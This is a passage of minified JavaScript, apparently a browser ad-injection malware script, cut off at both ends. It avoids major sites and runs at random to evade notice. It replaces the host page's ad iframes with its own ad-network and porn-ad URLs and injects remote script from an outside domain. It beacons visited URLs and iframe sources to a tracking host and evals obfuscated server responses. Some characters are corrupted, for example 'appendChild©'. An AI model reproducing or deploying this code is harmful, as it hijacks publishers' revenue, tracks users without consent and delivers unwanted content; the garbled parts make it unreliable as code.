1||url.indexOf(\"searchgol.com\")>-1||url.indexOf(\"trovi.com\")>-1||url.indexOf(\"search.ask\")>-1||url.indexOf(\"mywebsearch.com\")>-1||url.indexOf(\"search-results.com\")>-1||url.indexOf(\"mysearch.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"http://sporty-glow.com/\")>-1||url.indexOf(\"http://game-trek.net/\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|searchisfun|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info/)||url.indexOf(\"search.searchonme.com\")>-1||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"search.appsarefun.info\")>-1||url.indexOf(\"websearch.mocaflix.com\")>-1||url.indexOf(\"search.easylifeapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"us.yhs4.search.yahoo.com\")>-1||url.indexOf(\"search.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1){return}}catch(e){};if(Math.ceil(Math.random()*40)==1){(function(){var a = \"microsoft msn youtube.com ninemsn yahoo maktoob rivals amazon jeuxvideo xbox flickr outlook microsoftstore alltheweb intonow overture tumblr live facebook embedr altavista ashleyfurniturehomestore reddit tripadvisor rightmedia craigslist sprint mozilla att omg.com apple americanexpress\".split(\" \");for(var i=0;i<a.length;i++) if(window.self.location.hostname.indexOf(a[i])>-1){return};try{if(typeof(localStorage)!='undefined' && (window.self.location.hostname.indexOf('adnxs.com')>-1 || window.self.location.hostname.indexOf('doubleclick')>-1 || window.self.location.hostname.indexOf('cloudfront')>-1)){localStorage.setItem(\"xhxg4sk42hsba\",\"9\")}}catch(e){};var _wlst={lsKey:\"xhxg4sk42hsba\",get:function(b,a){if(window.self.location.protocol==\"https:\" || 3<b)return a(!1);var d=this.fetch();if(d)return a(parseInt(d));if(1==b){crc=this.hcrc32(window.self.location.hostname.replace(\"www.\",\"\"));try{var c=document.createElement(\"script\");c.type=\"text/javascript\";try{c.async=\"async\"}catch(e){}c.src=\"http://v.zilionfast.in/\"+crc+\"/?t=vrt\";(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild©}catch(f){}}setTimeout(function(){_wlst.get(++b,a)},180)},fetch:function(){try{if(\"undefined\"!=localStorage)try{return localStorage.getItem(this.lsKey)}catch(b){return 0}else _wlst.getCkie()}catch(a){_wlst.getCkie()}},getCkie:function(){if(0<document.cookie.length&&(c_start=document.cookie.indexOf(this.lsKey+\"=\"),-1!=c_start))return c_start=c_start+this.lsKey.length+1,c_end=document.cookie.indexOf(\";\",c_start),-1==c_end&&(c_end=document.cookie.length),unescape(document.cookie.substring(c_start,c_end))},hcrc32:function(b,a){a||(a=0);var d=0;a^=-1;for(var c=0,e=b.length;c<e;c++)d=(a^b.charCodeAt©)&255,d=\"0x\"+\"00000000 77073096 EE0E612C 990951BA 076DC419 706AF48F E963A535 9E6495A3 0EDB8832 79DCB8A4 E0D5E91E 97D2D988 09B64C2B 7EB17CBD E7B82D07 90BF1D91 1DB71064 6AB020F2 F3B97148 84BE41DE 1ADAD47D 6DDDE4EB F4D4B551 83D385C7 136C9856 646BA8C0 FD62F97A 8A65C9EC 14015C4F 63066CD9 FA0F3D63 8D080DF5 3B6E20C8 4C69105E D56041E4 A2677172 3C03E4D1 4B04D447 D20D85FD A50AB56B 35B5A8FA 42B2986C DBBBC9D6 ACBCF940 32D86CE3 45DF5C75 DCD60DCF ABD13D59 26D930AC 51DE003A C8D75180 BFD06116 21B4F4B5 56B3C423 CFBA9599 B8BDA50F 2802B89E 5F058808 C60CD9B2 B10BE924 2F6F7C87 58684C11 C1611DAB B6662D3D 76DC4190 01DB7106 98D220BC EFD5102A 71B18589 06B6B51F 9FBFE4A5 E8B8D433 7807C9A2 0F00F934 9609A88E E10E9818 7F6A0DBB 086D3D2D 91646C97 E6635C01 6B6B51F4 1C6C6162 856530D8 F262004E 6C0695ED 1B01A57B 8208F4C1 F50FC457 65B0D9C6 12B7E950 8BBEB8EA FCB9887C 62DD1DDF 15DA2D49 8CD37CF3 FBD44C65 4DB26158 3AB551CE A3BC0074 D4BB30E2 4ADFA541 3DD895D7 A4D1C46D D3D6F4FB 4369E96A 346ED9FC AD678846 DA60B8D0 44042D73 33031DE5 AA0A4C5F DD0D7CC9 5005713C 270241AA BE0B1010 C90C2086 5768B525 206F85B3 B966D409 CE61E49F 5EDEF90E 29D9C998 B0D09822 C7D7A8B4 59B33D17 2EB40D81 B7BD5C3B C0BA6CAD EDB88320 9ABFB3B6 03B6E20C 74B1D29A EAD54739 9DD277AF 04DB2615 73DC1683 E3630B12 94643B84 0D6D6A3E 7A6A5AA8 E40ECF0B 9309FF9D 0A00AE27 7D079EB1 F00F9344 8708A3D2 1E01F268 6906C2FE F762575D 806567CB 196C3671 6E6B06E7 FED41B76 89D32BE0 10DA7A5A 67DD4ACC F9B9DF6F 8EBEEFF9 17B7BE43 60B08ED5 D6D6A3E8 A1D1937E 38D8C2C4 4FDFF252 D1BB67F1 A6BC5767 3FB506DD 48B2364B D80D2BDA AF0A1B4C 36034AF6 41047A60 DF60EFC3 A867DF55 316E8EEF 4669BE79 CB61B38C BC66831A 256FD2A0 5268E236 CC0C7795 BB0B4703 220216B9 5505262F C5BA3BBE B2BD0B28 2BB45A92 5CB36A04 C2D7FFA7 B5D0CF31 2CD99E8B 5BDEAE1D 9B64C2B0 EC63F226 756AA39C 026D930A 9C0906A9 EB0E363F 72076785 05005713 95BF4A82 E2B87A14 7BB12BAE 0CB61B38 92D28E9B E5D5BE0D 7CDCEFB7 0BDBDF21 86D3D2D4 F1D4E242 68DDB3F8 1FDA836E 81BE16CD F6B9265B 6FB077E1 18B74777 88085AE6 FF0F6A70 66063BCA 11010B5C 8F659EFF F862AE69 616BFFD3 166CCF45 A00AE278 D70DD2EE 4E048354 3903B3C2 A7672661 D06016F7 4969474D 3E6E77DB AED16A4A D9D65ADC 40DF0B66 37D83BF0 A9BCAE53 DEBB9EC5 47B2CF7F 30B5FFE9 BDBDF21C CABAC28A 53B39330 24B4A3A6 BAD03605 CDD70693 54DE5729 23D967BF B3667A2E C4614AB8 5D681B02 2A6F2B94 B40BBE37 C30C8EA1 5A05DF1B 2D02EF8D\".substr(9*d,8),a=a>>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['velis_adr6',1421],['dsnr_dasa2',3079],['dsnr_nntbr2',3079],['cpx_cybersoft3_new',948],['matomy_adj48_new',473],['ybrant_apn3785',1000]],[['mari_strm_E',5000],['matomy_strm53',5000]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function(b){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('ZsD3oYDl=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"servedby.adsplats.com\"||window.self.location.hostname==\"ads.incmd01.com\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=506761')>-1|| _zyad.location.indexOf('=511181')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i<b.length;i++)try{if(b[i]&&b[i].getAttribute(\"name\")){var a=b[i].getAttribute(\"name\").toLowerCase();if(\"description\"==a||\"keywords\"==a)_zyad.title=_zyad.title+\" \"+b[i].getAttribute(\"content\")}}catch(d){}}catch©{}b=\"porn sex xxx tits adult lesbian squirt creampie bondage ExSuna mature fisting [bleep] gangbang orgy gay nude tits tranny blowjob handjob masturbat busty [bleep] joder horny mamada polla [bleep] pussy threesome teens milf bdsm hentai motherless erotic cams petite\".split(\" \");for(i in b)if(-1<_zyad.location.indexOf(b[i])||-1<_zyad.title.indexOf(b[i]))return!0;return!1},epoch:function(){try{var b=new Date;try{return(b.getTime()-b.getMilliseconds())/1E3}catch(a){return parseInt(b.getTime()/1E3)}}catch(d){return 0}},between:function(b,a){return b>=a-7&&b<=a+7},detectRsize:function(b){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function(b){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i<d.length;i++){if(!b)try{if(d[i].hasAttribute(\"s14951768182262370501\"))continue}catch©{try{if(d[i].getAttribute(\"s14951768182262370501\"))continue}catch(e){}};try{if(d[i].src.indexOf('=506761')>-1||d[i].src.indexOf('=511181')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s14951768182262370501\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a.ifr,a.size);b++;a&&a&&\"function\"==typeof a.func&&setTimeout(function(){a.func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000<d&&(c=Math.floor((10000-d)/g.length+0.9));for(i=0;i<g.length;i++)if(d=g[i],f+=_zyad.networks_conf[i][1]+c,f>=e){h[d](b);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'ZsD3oYDl=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('<html><head>\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script></head><body>&nbsp;\\x3c/body>\\x3c/html>');}catch(e){var h = '<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body><iframe name=\"a7h3h73d3\" src=\"about:blank\" style=\"width:100%;height:100%;border:0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"100%\" height=\"100%\"></iframe>\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script></body></html>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style>\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script></head><body>&nbsp;</body></html>');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body>'+url+'</body></html>');break;}try{ifr.setAttribute(\"s14951768182262370501\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{velis_adr6:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2703082\",\"300x250\":\"2703083\",\"120x600\":\"2703084\",\"160x600\":\"2703085\",\"468x60\":\"2703086\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1469,size]);}}catch(e){return !1;}},dsnr_dasa2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3024342&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1596,size]);}}catch(e){return !1;}},dsnr_nntbr2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3024616&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1605,size]);}}catch(e){return !1;}},cpx_cybersoft3_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsplats.com/tt?id=3294776&size=+size+&referrer=${REFERER_URL}' (atp?atp:1), [1721,size]);}}catch(e){return !1;}},matomy_adj48_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3223120&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1722,size]);}}catch(e){return !1;}},ybrant_apn3785:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size==\"120x60\")return;var rfr=window.self==window.top?encodeURIComponent(window.self.location.href):'';var arr={\"728x90\":\"2\",\"300x250\":\"1\",\"468x60\":\"3\",\"120x600\":\"5\",\"160x600\":\"4\"}[size];var surl='http://ads.incmd03.com/creative/2-002136823-00001i;size='+arr+';tag_id=3785;ref='+rfr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1013,size]);}}catch(e){return !1;}},mari_strm_E:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"3168702\",\"300x250\":\"3168703\",\"160x600\":\"3168704\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1709,size]);}}catch(e){return !1;}},matomy_strm53:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3223135&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1720,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-iframe-display.php?type=+size+&login=hulkshare_RS2&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random();if(!document.getElementById(\"sad32ecs3fdsa\")&&1==Math.ceil(4*Math.random()))try{setTimeout(function(){var b=document.getElementsByTagName(\"body\")[0],a=document.createElement(\"div\");a.setAttribute(\"style\",\"width:728px;height:90px;margin:0 auto\");a.setAttribute(\"id\",\"sad32ecs3fdsa\");a.innerHTML='<iframe src=\"//ads.ventivmedia.com/www/delivery/afr.php?zoneid=31&cb='+Math.random()+'\" style=\"width:728px;height:90px\" frameborder=\"0\" scrolling=\"no\"></iframe>';b.insertBefore(a,b.firstChild)},1)}catch(e){};;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();})()}else{(function(){var stngs = {attr_name:'s11910493070053587494',szy_domain:[\"senddownloadmy.com\",\"superstoragemy.org\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12],[600,400,13]],checkif:function(ifr){return (ifr.getAttribute('s11910493070053587494') || ifr.src.indexOf('=506761')>-1||ifr.src.indexOf('=511181')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};window.adzy653rk={nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"1\",eid:\"678\",hid:\"11910493070053587494\",lt:\"5.58\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"ZsD3oYDl\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);return a&&a[0]}return null}(),getKeywords:function(){var a=adzy653rk.imp.title,c=document.getElementsByTagName(\"meta\");if©for(var b=0,d=c.length;b<d;b++)\"keywords\"!=c.name.toLowerCase()&&\"description\"!=c.name.toLowerCase()||(a+=\" \"+c.content.replace(/,/g,\" \"));if(b=document.getElementsByTagName(\"a\")){c={};for(d=0;d<b.length;d++)try{var e=b[d].innerText;\"undefined\"==typeof e&&(e=b[d].textContent);for(var f=e.toLowerCase().split(/[\\s,-]/g),h=0;h<f.length;h++)4>f[h].length||(c[f[h]]?c[f[h]]++:\nc[f[h]]=1)}catch(k){}var e=[],g;for(g in c)e.push([g,c[g]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(g=0;g<e.length;g++)a+=\" \"+e[g][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)},init:function(){var a=document.getElementsByTagName(\"iframe\");if(a.length){for(var c=[],b=0;b<a.length;b++)stngs.checkif(a)||(a.setAttribute(adzy653rk.imp.rattr,\"true\"),a.setAttribute(\"replaced\",\"true\"),c.push(a));if(c.length){var d=function(a){if(a>=c.length){var b=adzy653rk.imp;adzy653rk.jbs.at.length?\nadzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+b.pid+\"&subid1=\"+b.hid+\"&subid2=\"+b.eid+\"&lt=\"+b.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords())+(adzy653rk.topHost?\"&tdh=\"+encodeURIComponent(adzy653rk.topHost):\"\"),\"seta\"):adzy653rk.destruct()}else{if(b=adzy653rk.getAt(c[a]))adzy653rk.jbs.ifr.push(c[a]),adzy653rk.jbs.at.push(b);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},\ndfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300<a))){var c=function(b){b>=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},1200):(adzy653rk.src&&adzy653rk.ifr&&adzy653rk.ifr.src!=adzy653rk.src[0]&&(adzy653rk.ifr.nextSibling.innerHTML&&adzy653rk.ifr.nextSibling.innerHTML.match(/<span[^>]?>Ads( not)? by/i)?(new Image).src=\"http://zig.installerdatauk.info/?aid=2&bid=1&hid=11910493070053587494&eid=678&pid=1&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr.src):\n((new Image).src=\"http://zig.installerdatauk.info/?aid=1&bid=1&hid=11910493070053587494&eid=678&pid=1&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr.src),adzy653rk.ifrset(adzy653rk.ifr,adzy653rk.src[1],1))),setTimeout(function(){c(++b)},1))};c(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.init,1200)},getAt:function(a){a=[parseInt(\"number\"==\ntypeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var c=adzy653rk.imp.sizes,b=0;b<c.length;b++)if(a[0]>=c[0]-5&&a[0]<=c[0]+5&&a[1]>=c[1]-5&&a[1]<=c[1]+5)return c[2];return!1},getAds:function(a,c){if(-1<navigator.userAgent.indexOf(\"MSIE\")){var b=document.createElement(\"script\");b.type=\"text/javascript\";b.src=a+\"&cb=adzy653rk.\"+c;b.onreadystatechange=\nb.onload=function(){try{b.parentNode.removeChild(b)}catch(a){}};try{window.adzy653rk=adzy653rk,(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild(b)}catch(d){}}else{var e=new XMLHttpRequest;e.open(\"GET\",a,!0);e.onreadystatechange=function(){if(4==e.readyState)adzy653rk[c](e.response)};e.send(null)}},seta:function(a){var c=null;try{var b=adzy653rk.l.decode(a);\"undefined\"!=typeof JSON&&JSON.parse?c=JSON.parse(b):eval(\"ifrl = \"+b)}catch(d){}if(c&&c.length)for(a=\n0;a<c.length;a++)c[a]&&adzy653rk.jbs.ifr[a]&&adzy653rk.ifrset(adzy653rk.jbs.ifr[a],c[a]);adzy653rk.destruct()},ifrset:function(a,c,b){b||(adzy653rk.ifr.push(a),c[0]=c[0].replace(/\\[##([^#]+)##\\]/g,function(a,b){return adzy653rk.imp[toekn]?adzy653rk.imp[toekn]:\"\"}));var d=[\"<html><head><style>html,body{width:100%;height:100%;margin:0}</style></head><body>\",\"</body></html>\"];switch(c[1]){case 1:a.src=c[0]+(-1<c[0].indexOf(\"?\")?\"&\"+adzy653rk.imp.jpshort+\"=\"+c[2]+\"_18x18_0\":\"\");break;case 2:a.src=\"about:blank\";\ntry{a.contentWindow.document.write(d[0]+'<iframe src=\"'+c[0]+'\" style=\"width:100%;height:100%;border:0;\" scrolling=\"no\" frameborder=\"0\"></iframe>'+d[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+c[0]+d[1])}catch(f){}}b||adzy653rk.src.push([a.src,c])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var c=\"\",b=0;b<a.length;){var d=this.xlat.indexOf(a.charAt(b++)),\ne=this.xlat.indexOf(a.charAt(b++)),f=this.xlat.indexOf(a.charAt(b++)),h=this.xlat.indexOf(a.charAt(b++)),k=(e&15)<<4|f>>2,g=(f&3)<<6|h,c=c+String.fromCharCode(d<<2|e>>4);64!=f&&0<k&&(c+=String.fromCharCode(k));64!=h&&0<g&&(c+=String.fromCharCode(g))}return this._utf8_decode©},_utf8_decode:function(a){for(var c=\"\",b=0;b<a.length;){var d=a.charCodeAt(b);if(128>d)c+=String.fromCharCode(d),b++;else if(191<d&&224>d)var e=a.charCodeAt(b+1),c=c+String.fromCharCode((d&31)<<6|e&63),b=b+2;else var e=a.charCodeAt(b+\n1),f=a.charCodeAt(b+2),c=c+String.fromCharCode((d&15)<<12|(e&63)<<6|f&63),b=b+3}return c}}};\nadzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 &&adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"optimizedby.brealtime.com ads.mangomediaads.com www.adshost2.com s-tag.z5x.net ad.z5x.net exchange.admailtiser.com ads.geverads.com ad.yieldmanager.com kncxsw.com creative.rev2pub.com ad.adserverplus.com servedby.adxplosions.com n103adserv.com cdn.trkclk.net srv.aileronx.com smgadserver.com ads.ventivmedia.com servedby.adsplats.com ad.reachjunction.com ads.deliads.com srv1.statisticsreporting.com advs.adgorithms.com ads.ad-maven.com ad.adnetwork.net ads.incmd03.com ads.mediawhite.com Servedby.bigfineads.com a.ad-sys.com hxewaz.com ads.yahoo.com tala.intlsources.com an.z5x.net c5.zedo.com ib.adnxs.com ad.jumbaexchange.com tr.adsplats.com ads.sonobi.com fw.adsafeprotected.com ad.improvemedianetwork.com media.glispa.com\".indexOf(window.self.location.hostname)==-1 &&adzy653rk.location.indexOf(\"zoneid=506761\")==-1 &&adzy653rk.location.indexOf(\"zoneid=511181\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 &&adzy653rk.location.indexOf(\"1018-1005\")==-1 &&adzy653rk.location.indexOf(\"1019-1001\")==-1 &&adzy653rk.location.indexOf(\"PT1312\")==-1)adzy653rk.init()})()};(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c 